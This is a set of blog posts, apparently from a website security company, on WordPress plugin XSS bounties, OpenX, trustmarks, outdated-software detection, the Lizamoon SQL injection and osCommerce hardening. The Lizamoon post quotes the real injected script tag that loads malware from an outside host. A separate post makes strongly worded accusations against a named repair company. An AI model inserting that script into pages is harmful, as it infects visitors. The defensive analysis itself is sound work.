Our First WordPress Plugin Security Bug Bounty Payouts

We finally have an opportunity to discuss our first two security bug bounty payouts for WordPress plugins, both for relatively minor issues. We actually paid them out in late October but we were waiting until after one them was finally fixed (the other was fixed within hours of the developer being notified) to write about the issue.

Both NextGEN Gallery and WP e-Commerce suffered from reflective cross-site scripting (XSS) vulnerabilities in the portion of the plugin accessible in the admin area. With a reflective XSS vulnerability if an attacker can get you to visit a specially crafted URL they can cause the website included arbitrary HTML code, most often JavaScript, which they specify. That could be used to cause actions to take place of the web page, another file to be loaded, your browser cookies to be read, among other things.

XSS vulnerabilities are not as big an issue as vulnerabilities that allow adding arbitrary code to a database or into a file. Because these two vulnerabilities are only accessible in the admin area, it limits there severity even more. If they were to be used by an attacker they would be used in a attack to target at an individual website instead of a mass attack. Most attacks on WordPress based websites are mass attacks.

A fix for NextGEN gallery was included in version 1.8.4 and a fix for WP e-Commerce was included in version 3.8.7.3.

Web Browser Based Reflective XSS Protection

The ability to exploit the vulnerabilities is also limited by protections in some web browsers designed to restrict reflective XSS vulnerabilities from occurring. While doing a test with a XSS that attempts to load a JavaScript file from a third-party website that reads cookies associated with the WordPress based website we found that the web browsers performed as follows:

We found that both Chrome 15 and Safari 5, whose protection come the WebKit rendering engine they share, were able to successfully block the attempted XSS.

We found that Internet Explorer 9 only blocked the attempt XSS if you were already logged into WordPress when attempting to access the malicious page. If you were not logged in you would be asked to login and then be taken to the malicious page where the XSS was not blocked. This is due to Internet Explorer disabling the protection for requests originating from the same website. This is one of a number of weaknesses in Internet Explorer’s protection discussed in the paper Bypassing Internet Explorer’s XSS Filter (PDF).

Firefox doesn’t currently provide any similar functionality, but with the NoScript add-on installed we found the attempted XSS was blocked.

Keep in mind that the web browser protections are not full proof and it is possible that XSS attacks could be crafted that can evade the protections.

Testing Security Plugins Against These Vulnerabilities

Now that updates for both plugins have been released the way to prevent these vulnerabilities is to make sure you are running the latest version, which should make sure to with any installed plugins, but what about similar vulnerabilities that developer are not yet aware of? The biggest protection that you have is that targeted attacks are rather uncommon, so you are unlikely to be exposed to this type of issue. Then protection comes from being careful when clicking on links and using a web browser that provides protections against this type of hack.

There are also a number of security plugins for WordPress, some on them specifically claim to protect against XSS. We wanted to see if they would have blocked the exploitation of the vulnerability in either plugin. To test this out a crated a XSS attempts to load a JavaScript file from a third-party website that reads cookies associated with the WordPress based website. We used Firefox without NoScript so that any protection would be from the plugin and not the browser.

For this test, we tested plugins that did not require signing up for any service. We tested the following plugins:

BulletProof Security
Secure WordPress
Better WP Security
TTC WordPress Security Tool

For all four plugins we found that provided no protection. This is rather disappointing as this is just the type of thing they might be useful for. Most times when WordPress based websites are successfully attacked it is due to outdated software, which keeping software updated would have prevented, or it is due to a hacker gaining access to the underlying files that make up WordPress. In a case where the hacker has access to the underlying files the plugins cannot prevent access to the files (making files un-writeable is generally not effective as the hacker generally has the ability to make the writeable again) and the hacker could remove or modify the plugins. They could even modify the software to report that the website is still secure (You probably won’t find much security software of this type warning about this serious weakness, though it doesn’t appear that many hackers bother doing that as the software isn’t popular enough to be worth the time it would take to do that.).

OpenX Continues Questionable Security Posture

Last Thursday OpenX released version 2.8.8 of their software. They have yet to make any sort of public announcement of the update on their blog or anywhere else that we could find. The only information given, found on the Product Updates page in the OpenX admin interface, says that:

It is highly recommended to install this update as soon as possible, because it contains a number of security fixes. The version of OpenX which you are currently using might be vulnerable to certain attacks and is probably not secure.

With a release that includes important security fixes, as this seems to be, you would expect that they would want to make sure people that use their software would be well aware of the update.

There was no information was given as to what the vulnerabilities were or what other changes were made in the new version. This is a continuing practice from OpenX as we have written about before. While it is understandable that developers would want to limit the amount of information to make it harder to for people to be able to exploit the vulnerabilities, hackers have shown that they are able to hack OpenX without this information and the information would be useful for people not looking to hack OpenX.  To repeat what we said after the last OpenX release, “[w]ithout knowing what the issue or issues that were fixed makes it hard to determine the source of a hacking, potentially leading to new vulnerabilities that are exploited in OpenX going undiagnosed in the future if the OpenX installation hacked was running an out of date version.” It also makes it hard for anyone to independently verify the vulnerabilities were fully and properly fixed in the newer version.

The larger concern we have now is that OpenX seems to continue to be releasing security fixes in response to vulnerabilities being actively exploited, commonly referred to as zero-day exploits, instead them being found beforehand during development or during subsequent security reviews. We know that with past vulnerabilities they were being exploited before updates were released. We have seen some reporting that vulnerabilities in the last version were being exploited (with the most specific report we were not able to replicate the vulnerability, but that could be because of using a different server configuration) before this version was released. This at least means that users keeping the software up to date are not safe from being hacked, which they generally are with most web software that have a good track record of finding and fixing vulnerabilities in their software before they can be exploited. It also could be an indication that OpenX is not as concerned about the security of the software as they need to be for something that is so widely deployed.

What makes there apparent lack of concern towards the security of their software more troubling is the way they used the update message for 2.8.8 as a chance to promote their hosted solutions. This is the message that followed the warning about the need to update:

OpenX also provides both free and Enterprise hosted versions of the ad server, offering significant improvements in both infrastructure and functionality. Both of these products are managed and operated by the OpenX team, including upgrades, maintenance, and security scans, freeing you and your team from handling such issues. If ad serving is mission-critical to your business, we suggest contacting our team to learn more about OpenX Enterprise. As always, please let us know of any potential security problems by emailing security@openx.org.

All the hacks of OpenX we have dealt with so far have been due to security vulnerabilities in the OpenX software and not due directly to something related to self-hosting. In many of those cases OpenX had released a update before they were hacked, so automatic upgrades provided by their hosted solutions would have helped. But unless OpenX is providing their hosted customers with a more secure version of OpenX, then the hosted customers remain as vulnerable before the fixes for the security vulnerabilities are released. The quality of their security scans should be in question as well, if vulnerabilities keep getting found and exploited before they are fixed by OpenX.

Update (November 14, 2011):

Another thing that should be noted when considering how OpenX views the importance of security is the fact that their blog is still running WordPress 2.6.2. One of the most basic and important security measure anyone running a website should be doing is making sure they keep any software running on the website up to date. The version they are currently running is now over three years out of date. Since version 2.6.2 there have been 16 releases that include security fixes that they have missed (and 26 overall releases).

Our New Web Browser Extension to Warn When Outdated Software is Being Used

We are always looking for ways how we can help to improve the security of the web. One of the basic security measures that needs to be taken to keep websites secure is keeping the software running on them up to date, as newer releases often contain security fixes and enhancements.

The developers of web software have done a lot to make that easier by providing messages in the software that the websites is in need of update and making the update process easier. Even with this there is still many website running outdated versions of that software.

When we are in touch with people running websites whether they are potential clients, people we are contacting to let them know their website has been hacked, or for some other reasons, we make sure to let them know if we see they are running outdated software that needs to be updated. We only reach a limited number of people so to increase awareness that outdated software is running on websites we have created a new web browser extension, named Meta Generator Version Check, to make it easier for others to see when there is outdated software running a website.

With the web browser extension installed, each time a web page finishes loading the extension checks the web page’s source code for a meta generator tag. The one for the current version of WordPress looks like:

<meta name="generator" content="WordPress 3.2.1" />

After reading that, the extension then provides a warning if it detects one of the following software is running on the website:

  • WordPress versions prior to 3.2.1
  • Joomla 1.0 and Joomla 1.6
  • Mediawiki versions 1.16.4-1.13 (earlier versions do not contain a meta generator tag)
  • vBulletin versions prior to 3.8.7
  • TYPO3 versions prior to 4.3
  • Movable Type versions prior to 4.37, 5.06, and 5.12
  • Melody versions prior to 1.0.2

Looking at that list you might notice that there is a fair amount of software missing. The limitation of checking the meta generator is that not all software produces one and some of those that do, do not provide a tag that allows us to identify what version is running. In other cases only partial version information is given. For Joomla, this means the extension can warn about websites running Joomla 1.0 and 1.6, which are no longer supported, but for Joomla 1.5 and Joomla 1.7 there is no indication if they are running the current version of those, as of yesterday they were 1.5.24 and 1.7.2, or an older version.

Another issue we have found as we looked to add checks for more software is that the supported versions of software are not always easy to find. We would recommend that software developers make sure that they prominently display what versions of their software are supported so that people looking for that information can easily find it.

If you see that we are missing a check for software that provides the required information in the meta generator tag please let us know so that we can include that in the extension.

While it would be possible to have the extension do a more intensive check to determine what version of software is running on website, using information not available in the meta generator tag, this would in most cases require requesting additional files when each page is loaded and would provide information that is not being made available by the web page itself.

We currently plan to update the extension to warn that software is outdated a month after a subsequent version has been released or support has ended for a version. For severe security vulnerabilities the extension may e updated sooner provide an earlier warning.

Uses

The main use for the extension is to be alerted that websites that you are visiting are running outdated software so that you can let them know that they need to update it or if they are your client you can do the update yourself.

It also could be useful in looking at who you considering doing business with or what software you might use on your website.

If a web host isn’t keeping software on the frontend of their website updated, it is reasonable to be concerned that they might not be taking proper security measures for their hosting clients as well. After checking just a few web hosts we found that both Just Host (3.0.3) and IX Web Hosting (3.1) were running outdated version of WordPress. It is also interesting to note that homepage of IX Web Hosting’s website has security seals from both McAfee Secure and something called Ecommerce HackerShield (which appears to something created IX Web Hosting’s parent company) claiming the website is secure despite the outdated software, with known security vulnerabilities, running on a sub-domain of the website and linked directly from the homepage.

For software, an example of something that might be concerning that we just noticed with a piece of software that we run on our website, Piwik, is that their website is still running WordPress 3.0.4.

Availability

A version of the extension is now available for Chrome. A version for Firefox is currently pending a review from Mozilla. The Firefox version has some limitations in comparison to the Chrome version due to current limitations of the Mozilla Add-On SDK, as the Add-on SDK is further developed those limitations will also go away. A version for Safari will not be released until Apple modernizes their enrollment process for Safari Extension development.

You can also find a web-based version of the tool here.

Is Running Outdated Software Always a Security Concern?

Outdated software is not automatically less secure than a newer version, it would only be more insecure if it contains a security vulnerability that does not exist in a newer version. Often new releases include fixes for security vulnerabilities or security enhancements. There is also a possibility that changes have been made in a newer version that removed a security vulnerability that was not known to be security vulnerability at the time. To be safe it is a good rule to update the software even if the developers have not warned of vulnerabilities in prior versions. To keep things simple we have decided that the extension will warn if outdated version is running instead providing a warning only when we know an old version contains a security vulnerability.

Is Including a Meta Generator a Security Concern?

With software that includes a meta generator tag there are often people claiming that it makes websites less secure, this is especially true when it comes to WordPress.  We previously discussed the issue in detail in regards to WordPress. The summary of that is as follows: The bad guys are not generally checking the meta generator tag and they usually don’t even check if you are running the software they are trying to exploit. On a daily basic there are attempts to exploit software that is not and has never been on our website. Because the bad guys attempting to exploit vulnerabilities do not bother to check what version of software you are running the website, you will get hacked if you are running a version with that vulnerability even if you managed to completely hide the version running. Finally, if someone wanted to find out what version you are running they could do that even if you remove the meta generator tag.

With our new extension we think it makes even more sense to include a meta generator tag as it increases the usefulness of the tag by letting people inform others they have outdated software running on their website that needs to be updated.

VeriSign’s Bad Advice on Protecting Websites from Malware

If you do a Google search related to website malware right now you might right run across the following ad from VeriSign:

VeriSign Malware Scan
What you need to know about malware & how to protect your site

Someone interested in how to protect their website from malware might click on the ad hoping to learn about doing that. From the page the ad takes you to you could visit a page titled FAQ: Web Site Malware Scanning. One of the questions in the FAQ is “How can I protect my site from malware?”. This looks like the information their advertising was promoting.  Here is what they say:

Like most thieves, malware hackers look for easy targets—such as a Web site where malware will go undetected for as long as possible. Posting the VeriSign Trust Seal on your Web site is like posting an alarm security sign in your front window. It shows hackers that your site is scanned daily to detect malware.

There are probably many variations on what would be a good answer to this question. Verisigns answer is certainly not one of them. Not only have they given really bad advice for protecting websites, but the answer suggests a scenario that is almost never going to happen.

The scenario in the answer suggests that hackers are going to view the website before they attempt to hack it. In almost all instances that is not the case. Not only is someone not likely to view the website before attempting to hack it, but there probably will not be a person directly controlling the attempted hack. Instead, the hacking attempt is likely to be automated.

For example, someone might setup a program to go through every domain name attempting to exploit a vulnerability in an outdated version of WordPress. Because no one is viewing the website before attempting to hack it the VeriSign Trust Seal will have no impact on whether the website is hacked or not. The best that malware scanning could do in this case would be to quickly warn that the website is infected. The worst case would be the scanner not detecting the infection until it has potentially infected many visitors. What is hopefully obvious is that if you are not running an outdated version of WordPress you would not get infected in the first place.

The right way to protect your website against these types of hacks, which are done in this automated fashion, is by taking the measures we have written about here. If your website is properly secured you are very unlikely to get infected so malware scanning is of little use. If you wanted make sure that you are warned quickly if your website is ever infected you set it up so that Google will send email to an address of your choice if they ever detect malware on your website.

So would the seal have any deterring effect on someone who has decided to target your website? It is hard to say for sure, but it seems unlikely it would have any effect. If someone were looking for easy targets they wouldn’t be trying target specific websites at all. It is much more efficient for them to use untargeted methods to find easy targets. What would be more likely to happen if they were targeting you is that they would test their malware to make sure it is not detected by the scanning done by Verisign before infecting your website. In that situation letting them know it was going on would not be helpful.

Verisign is owned by a major security company, Symantec, so they should be aware of all of this, especially since they decided to run advertising promoting that they would tell “What you need to know about malware & how to protect your site”. Either they don’t know about website malware, but are offering the service any way, or they know about it and they appear to be intentionally misleading potential customers.

Increased PHP Requirement for WordPress 3.2 Not a Major Issue

With the release of WordPress 3.2 coming up shortly (we are running the release client of it on our other blog without issue) the issue of its higher version requirements for PHP and MySQL have been coming up as a possible issue. One comment that we noticed was from a self-proclaimed security researcher was making the point this would lead to more outdated WordPress installations because servers are still running versions PHP below 5.2.4, which is the new required version, will not be able to be upgraded. On that point we have actual data on what version of PHP is running on servers and, more importantly, information on why an actual security researcher would see a much bigger issue with people still running a version of PHP below 5.2.4 than not being able to upgrade WordPress.

For every client that we need access to their website’s filesystem during our work we check the PHP version as well as other software running on the server (you can check your host using a tool we have created). For hosts having particularly outdated versions of software we alert the client to the issue and we also document some cases on our page detailing hosts with security issues. Our clients host websites around the world and with host provider of all sizes so the data should be a good representation of what is exists overall. We reviewed our data for this year and we found that none of our clients had been running a version of PHP 5 below 5.2.4, the lowest we found was 5.2.6. We did have some clients that were still running PHP 4, in all those cases we were able to switch them to PHP 5, above version 5.2.4, through the host’s control panel without issue. If you are still running PHP 4 you should make the switch as soon as possible as support for PHP 4 ended on December 31, 2007 and updates for critical security issues ended on August 8, 2008.

If there are still people on hosts that are only running a version of PHP less than 5.2.4 they probably have much bigger security issue than not being able to upgrade WordPress. PHP 5.2.4 was released on August 31, 2007 and last version PHP 4 was released on August 7, 2008. So that means their host has not bothered to upgrade one of the core pieces of software on their servers for nearly three or four years. While PHP itself is not a common target of hackers other server software is. Keep software running on the servers is the most basic security measures a host should be taking, if the host is not doing that then there is good chance that are not taking care of other security measures. There are many hosts that do take the basic security measures of keeping the server software up to date, so no one should be using a host that isn’t.

We would expect that a security researcher would know that you need to keep server software up to date and that PHP 5.2.4 itself is very outdated before making the statement they did. The fact that somebody claiming to be a security researcher doesn’t know this is a great example of why website security is in such a bad place. There are many people that are involved in website security that don’t’ know even the basics, but that doesn’t seem to stop them from telling others what they should be doing. If an actual security researcher were to complain about this, you would expect them to be suggesting that WordPress and other web software raise the required PHP version even higher. There have been numerous security fixes included in versions of PHP since version 5.2.4 was released and support for PHP 5.2 ended in December of last year. PHP 5.3 includes major changes that can cause software to break so many host are holding back switching to until more software is available with a version that supports PHP 5.3, but there is no reason they could not be running the last version of 5.2, 5.2.17. 5.2.17 was released over six months ago.

WordPress 3.2 also requires at least MySQL 5. None of our clients were running something below that this year. Support for the version below that, 4.1, ended on December 31, 2009.

Is It Time to Upgrade to Joomla 1.6?

Recently we have been having many discussions with clients about whether it is time for them to upgrade from Joomla 1.5 to Joomla 1.6, with most of the discussion surrounding whether it is necessary to do that now for security purposes. There are a number of factors that need to looked at to determine if it is time for you to upgrade.

It is often said that one of the most important measures for keeping a website secure is to insure that you are running the latest version of any software on the website. While that this is true in general, what isn’t mentioned explicitly in that advice, and many companies that claim to be security experts don’t seem to understand, is that you need to keep the software updated to one of the latest supported versions. If more than one version is supported at a time you don’t need to be running the latest version, just one of the latest supported versions. In the case of Joomla, both version 1.5 and 1.6 are currently supported with bug and security fixes. So at the moment you would be secure if you were running either 1.5.23 or 1.6.3. Back in January, when Joomla 1.6 was released, it was announced that support for Joomla 1.5 would continue for 15 months, so there is about year of support for Joomla 1.5 left.

A major reason for the continued support of Joomla 1.5 is that Joomla 1.6 is a major upgrade from Joomla 1.6, which requires migrating the Joomla database, some changes in Templates to be compatible with Joomla 1.6, and can require major changes in extensions to be compatible. At this point many extensions do not have a version compatible with Joomla 1.6; VirtueMart is one such extensions that comes up often during our discussions.

Joomla 1.6 does not introduce any features that directly increase security from hacking. An automatic update features has been added that makes it easier for Joomla and its extensions, which support the feature, to be updated. As keeping Joomla and its extensions up to date is the most important step to keep a Joomla website secure, this will hopefully improve security.

It is also important to note that Joomla 1.6 requires at least version 5.2 of PHP and version 5.0.4 of MySQL. At this point, hosting providers should already provide those, though in some cases you to switch to PHP 5 in your hosting account’s options. You can check what versions of those are currently being used on the System Info page, which is accessible from the Help menu in the Joomla admin.

So Should You Upgrade Now?

  • If you are in need of the new features in Joomla 1.6 and the extensions you need are compatible with it, you can upgrade now.
  • If you are in need of the new features in Joomla 1.6 and the extensions you need are not yet compatible, you will need to wait until those become available.
  • If you are not in need of the new features then you can wait to upgrade. You might want to begin planning for the upgrade, checking your template, scheduling for the upgrade to be performed during a non busy time for the website, etc.

Still Running Joomla 1.0?

While support ended for Joomla 1.0 in July of 2009 many website are still running Joomla 1.0. While we haven’t seen Joomla 1.0 to be a major target for hackers, we still strongly recommend upgrading to a supported version as soon as possible. While jumping to Joomla 1.6 appears to be the better option, as you will not need to make another major upgrade in the next year or so, it is not always possible yet and will require a larger change be made at one time. In our discussions involving Joomla 1.0 websites the major issues holding back upgrading to Joomla 1.6 has been that needed extensions are not yet compatible with the new version. Upgrading to Joomla 1.5 may require less change as it provides a legacy mode that allows some Joomla 1.0 templates and extensions to continue to run without modification, that feature does not exist in Joomla 1.6. You will still eventually need a template and extensions that are compatible with Joomla 1.6, but you would have over a year to get those in place while having a secured website in the mean time.

Why That Trustmark Doesn’t Mean a Website is Actually Secure

Three weeks ago it was disclosed that McAfee’s website contained numerous security vulnerabilities. What make this disclosure significant is that at the time the website was found vulnerable, the McAfee Secure service, which scans websites for security issues, was certifying that the website was secure and McAfee’s website contained a trustmark from McAfee Secure letting visitors know this. This claim was obviously not true at the time. This situation underscores the fact that the McAfee Secure service and other companies security scanning services, as well as the trustmarks they provide to websites, cannot be trusted to identify if a website is secure. This is because scanners can only actually determine is that the website does not contain specific security issues that the maker of the scanner knows about and is testing for. If, as in the case of McAfee’s website, they do not know about the specific security issue they would never detect it and the trustmark would still claim the website is secure.

In the case of McAfee they don’t even seem to be very focused on the security that their scanner is supposed to provide. On the web page for McAfee Secure, the emphasize is placed not on any increased security the product provides but on claims that having their trustmark on the website will increase sales for the website.

While those scanners limitation in only being albe to detect known security issues is a big issue there is also a much bigger problem with these scanners, they scan the website from the outside. This is often touted as a feature, but it is a major weakness of the services. What it means is that anything that is not accessible from the outside cannot be scanned, so even if a scanner could detect all possibilities security issues that are detectable from the outside the website can still be insecure. Here are a couple of real world examples we have dealt with where these scanners failed in this way:

We were contacted about a website in which files on the website were having spam links added to them repeatedly. The client had run two of these scanners and they hadn’t found the security issue allowing this to happen. After discussing the situation with them we were able to assist them in finding a backdoor script which was allowing this to occur. A backdoor script allows a hacker remote access to the website. In their simplest form they execute code sent to them. More advanced ones provide a variety of tools and the ability to view the websites files. It is almost impossible for one these scanners to detect a backdoor script. The backdoor script can be given a random name and placed anywhere in a website. So the scanner would need to scan a nearly unlimited number of URLs to be able to request the backdoor script. Depending on the backdoor script, they might also need to request the backdoor script in a certain way for it to be possible to detect that it is a backdoor that is at the location. Needless to say, these scanners do not attempt this.

In a more serious situation we had a client where credit card information entered on their website was being transmitted to someone who was using it to attempt to make fraudulent purchases. They had run it through one these scanners without it finding any issues. What we found was that a hacker had placed some code into the file that handled credit card input, which transmitted the information to another website. The web page were you inputted the credit card information was exactly the same as it would be without the code, so it is impossible for a scanner to detect this type of thing.

For webmasters who utilize widely used software like WordPress, Joomla, Drupal, etc., the software will have already been run through these security scanners, so as long you keep the software updated the scanners are of little use. If you use custom written software you’re much better off having someone who is a familiar with handling security in programming language the website is written in review your website. They might use one these  security scanners as part of their process in addition to other methods. They would also be able to correct the insecure code, which something that is going to need to done if the scanner identifies anything anyway.

What TVCNet/hackrepair.com Doesn’t Want You to Be Able to Read

Back in March we wrote a post about the danger of unethical hack repair services. This is certainly not the only area that we deal in where there is unethical behavior. On a fairly regular basis we are contacted about issues from companies that are being paid to maintain websites despite not knowing what they need to do maintain the websites and not having the ability to perform that maintenance even if they knew what it was.

In that post we discussed a company called TVCNet, which also does business as hackrepair.com, thehackrepairguy.com, and “The Hack Repair Guy”. We were stunned by a recent interaction with them and felt it was important to write about what happened so that public at large could be aware as well. Here is what we wrote about them in that post:

What we haven’t dealt with before is a company that offers to clean up hacked websites contact us and admit that they were unable to determine how a website was hacked and wanted us to do it for them. Then last week we were contacted by a representative from TVCNet, which also advertises their service at hackrepair.com. They told us that they were good at removing the hack code, but a website they cleaned was being reinfected and they couldn’t determine what was allowing the website to be reinfected. The infection that they describe was one that should have been very easy to determine the source of if they had even very modest experience dealing with cleaning up after hacks. It certainly should not have been a problem for someone that is charging clients 350 dollars to clean up a hacked website (they apparently charge extra to upgrade software, even though that is often essential for securing a website).

With a company operating in what we consider an unethical manner, it is not a surprise that they are also lying about their service. They claim that they “We will work direct with Google staff, and ensure your web site is unblocked by Google”. The truth is getting unblocked by Google is a completely automated process that doesn’t involve working directly with Google staff.

On Monday, they left a comment on our blog that sidestepped the substance of post, it appeared that may not have even bothered to read the post, while making a number of accusations against us (we moderate comments so you won’t see it). We sent them an email letting them know we would not be posting the comment and informing them that we would post a correction if there was a factual mistake in the post.  We are always happy to post a correction if there is a factual mistake in one of our post, that is mentioned in the “Did We Make a Mistake?”section of this blog’s sidebar.

The next day we received an email from them that claimed the post was inaccurate, but did not dispute any of the facts present in the article. What they did instead was to falsely accuse us of slander. It is impossible for our written post to have been slanderous, but it is also was not any other form of defamation either. Defamation requires, among other things, that a statement of fact be false. We stand behind the facts in that article as well as the opinions presented. They so far have also not disputed any of the facts present in the post.

In both instances they requested we remove the post. In the second instances they tied the request to their false accusation of slander, with the implicit implication of bringing that up that an illegal act had occurred and that there could be legal remedies. We won’t be doing that as it is important for the public to know of the danger of unethical hack repair services, especially if companies don’t want you to know about it.

There most recent response also raised other troubling issues. In the email they claim to have had to spend over 40 hours clearing up the hack in question. We have never spent anywhere that much time clearing up after hack and the hack in this case was particular simple so it should not have taken that long. To us, that seems to be an indication that something is really wrong with their capabilities or process. That further backs up our opinion that they operate in unethical manner by providing a service that do not have the necessary experience to do properly.

That response also indicated that they had moved that hacked clients to their hosting service. We strongly believe that hack repair providers should not involved in any way in with moving users to a hosting provider they have a financial relationship with, especially one that has had security issues within the recent past. In a post last year it was disclosed that TVCNet’s servers come “with the standard formmail.cgi  XSS and cgiecho  information disclosure vulnerabilities”. That post also claims that “you can bet they spin more than their fair share of BS.” So we are not the only people that have concerns about this company.

Before publishing this post, we will be offering not publish it as long as TVCNet agrees to stop trying to intimidate us into suppressing our previous posting about the danger of unethical hack repair services and stop making potentially defamatory statements about us. We hope they take up the offer and stop making a bad situation of their own making worse. If this is posted, it means that they continue to want the public not be able read this important information.

Update (April 22, 2011): Since this post was published the situation has taken an odd and disturbing turn. Employee(s) of TVCNet have become rather obsessed with our company and our employees. They have been posting bizarre, incoherent rants about us, as well as posting personal information about employees, across the Internet. At the same time they have not informed us of any actual factual mistakes in our original post, which if they actually existed we would happily post a correction for. What is occurring is certainly not something that a reputable company would be doing and unfortunately seems to be an indication that the employee(s) of the company may have mental health issues, if that is the case we certainly hope that they will get help for those issues.

The Hype Surrounding “Massive” Malware SQL Injections

Every so often there is another round of a fairly unsophisticated SQL injection that places malware scripts into poorly coded websites occurs and then there is a enviably a security company that hypes the infections and flood of new stories about it.  Another round of the infection occurred in the last week, dubbed Lizamoon by Websense who is the company to hype this round (we previously discussed Websense’s false claims of WordPress security issues). From what we have seen dealing with malware infected websites and other data confirms is that these “massive” infections are not massive as they are claimed to be each time, in fact they are of average size for a malware infection of websites. Most of those average size malware infections never receive any press coverage. The reason these attacks seems to receive the coverage is because of the use of Google search results to provide a large but highly inaccurate measure of the size of the infection.

The most important thing to understand about these infections, and this often not mentioned, is that they are completely preventable by properly sanitizing user input data that will be sent to a database. Anyone coding should be well aware of this the possibility of a SQL injection , these specific attacks have been occurring for years, and take the necessary precautions. Prevent SQL injections is one of key things mentioned in our article on securing your website from hackers. Widely used software like WordPress, Drupal, and Joomla are not susceptible to such a basic SQL injection. Unfortunately, even websites that get hit often don’t bother to take the necessary precautions to prevent these SQL injections. Instead, they often just remove the code from the database. There are also unethical website malware removal companies that will remove the infection from the database without insuring the SQL injection vulnerability has been fixed.

Normally you cannot search for a malware using Google’s search engine. This is due the fact Google only makes a web page’s text content searchable and not the HTML code that makes up the page. The malware either consists of a script of iframe tag, both of with are HTML code that would not be searchable. What happens with these injections is that they get placed throughout out the database, in some instances they are placed in a location where the code from the database is escaped while the web page is being generated. So in the source code it would look like

&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;

instead of

<script src=http://lizamoon.com/ur.php></script>

.Because the code has been escaped it will appear as text in the pages and therefore be searchable. When the code is placed into the website in escaped form it is not infectious.

There are several problems with trying to use Google search results to measure the size infection:

  • The number that Google provides in an estimate, it’s not all clear how accurate it is. If you include duplicate pages currently you can only see 604 results for the search “<script src=http://lizamoon.com/ur.php></script>” despite there being “about 1,470,000 results”.
  • The number includes any page, like this one, that mentions the code.
  • Not all pages that have the code are actually infection, because the code only searchable if it escaped. So it would require that another instance that is not escaped be one the page for it to be infectious. We checked the first 10 results for the search “<script src=http://lizamoon.com/ur.php></script>” which were still injected and found that only four of them were infectious.
  • Most malware infections are not measurable using search results making a comparison with them impossible using the metric.
  • Web pages are not a good measure of the reach of a malware infection. A page could be accessed millions of times a day or never.

The ideal way to measure the size of a malware infection would be to determine how many times each pages with the malware would be accessed. There is not a tool able to do this and there is unlikely to be one.  What we have found to best indicator available to measure the size of a malware infection size is Google Safe Browsing system. This system scans web pages from across the Internet for malware. This data is used to block infected websites in Google’s search results and is also used for malware protection in the FireFox, Chrome, and Safari web browsers.  It does not scan all websites and does not scan all of the websites it does scan equally, so the number won’t include every infected website. Google doesn’t indicate what criteria it uses to determine how often it scan various, but in general it scans more popular website more often so it should provide a good measure of how many website that people are likely to access were infected. At the moment the system reports that lizamoon.com has infected 1436 domains. That is far lower than the nearly 4 million websites claimed to have been infected according to one source, far lower than the 1,470,000 reported for a search on “<script src=http://lizamoon.com/ur.php></script>”, and far lower than “hundreds of thousands of domains” claimed by Websense. By comparison, the IP address 86.55.140.203 that is called by a infection that has recently been hitting many osCommerce based websites is reported to have acted as an intermediary for 2957 sites.

Securing osCommerce 2.2 and 2.3

osCommerce continues to be one of the most exploited pieces of web software. Back in October we wrote about the need to secure osCommerce to prevent these exploitations. Since then we have seen a lot of bad information on securing osCommerce against these exploitations as well as questions on securing osCommerce 2.3, which was released in November, so we have put together additional information on securing osCommerce 2.2 and 2.3.

osCommerce 2.2

There are several vulnerabilities in osCommerce 2.2 that are being exploited. The simplest and most effective method to protect against the exploitation of these vulnerabilities is to rename and password protect the admin directory. Doing this is also recommended by osCommerce.

Renaming the admin directory requires changing the name of the directory and changing the DIR_WS_ADMIN and DIR_FS_ADMIN lines in the /includes/configure.php file located in admin directory with the new admin directory name in place of admin.

The easiest way to enable password protection is using the HTACCESS from osC admin menu add-on (this is add-on has also been integrated into osCommerce 2.3) following these steps:

  1. Install the add-on, make sure to install the files located in the admin folder in the add-on to the renamed admin directory.
  2. Log in into the admin area.
  3. In the left hand menu, click on Administrators link in the Configuration section.
  4. Click edit.
  5. Enter your current password in the New Password field and select Protect With htaccess/htpasswd.

You can find information on extra security measures you can take in the osCommerce forum thread How to secure your osCommerce 2.2 site.

For existing osCommerce 2.2 based websites that do not already have these protections in place it is likely that the website has already been hacked. Many of these hacks only involve placing a backdoor script, which allows the hacker to run commands from and access files on the website. With the backdoor script in place they can come back later and use the website for malicious purposes. Other hacks involve using the website for spam, malware, or other malicious purposes.

The best way to insure that any code added by hacker has been removed is to revert to a clean backup of the website. Because osCommerce has been being hacked for so long it is unlikely that a backup that was made of the website from the last year or two would be clean at this point. If you have a copy of the website that was never placed on the website you could use that, you would need to add any new files you created since then, such as images.

Another method to clean the website is to remove the malicious code and files that the hackers have added. Malicious code is often added to the index.php and /includes/header.php. Backdoor scripts can be placed throughout the website; our Basic Backdoor Script Finder will find some of the most popular ones. You can also look for any .php files in the images folder and for files that begin goog1e located in the root directory of the osCommerce installation as the will be backdoor scripts.

osCommerce 2.3

osCommerce 2.3 included fixes for the vulnerabilities in osCommerce 2.2  and at this point there are no known vulnerabilities in 2.3.1 (there was an incorrect advisory that claimed there was one), so it would be safe to run the software without additional protection, but it is still recommend rename and password the admin directory.

It is possible to rename the admin directory during the installation of osCommerce 2.3. If the admin directory was not renamed during the installation it can be done by changing the name of the directory and updating the DIR_WS_ADMIN and DIR_FS_ADMIN lines in the /includes/configure.php file located in admin directory with the new admin directory name in place of admin.

Password protection is integrated into osCommerce 2.3, it can be turned on following these steps:

  1. Log in into the admin area.
  2. In the left hand menu, click on the Administrators link in the Configuration section.
  3. Click edit.
  4. Enter your current password in the New Password field and select Protect With htaccess/htpasswd.

You can find information on extra security measures you can take in the osCommerce forum thread How to secure your osCommerce 2.2 site (most of the information applies to 2.3 as well as 2.2).

osCommerce 2.3 also includes a number of security enhancements. The Portable PHP hashing framework has been added to more securely hash passwords, this software is also used in WordPress. A customer session token has been added “to forms to protect against Cross-Site Request Forgeries (CSRF)”. A new section of the admin, Security Directory Permissions, displays the current write permission of the various osCommerce directories and what the recommend permissions are. A built-in version checker allows for checking if a new version of osCommerce has been released.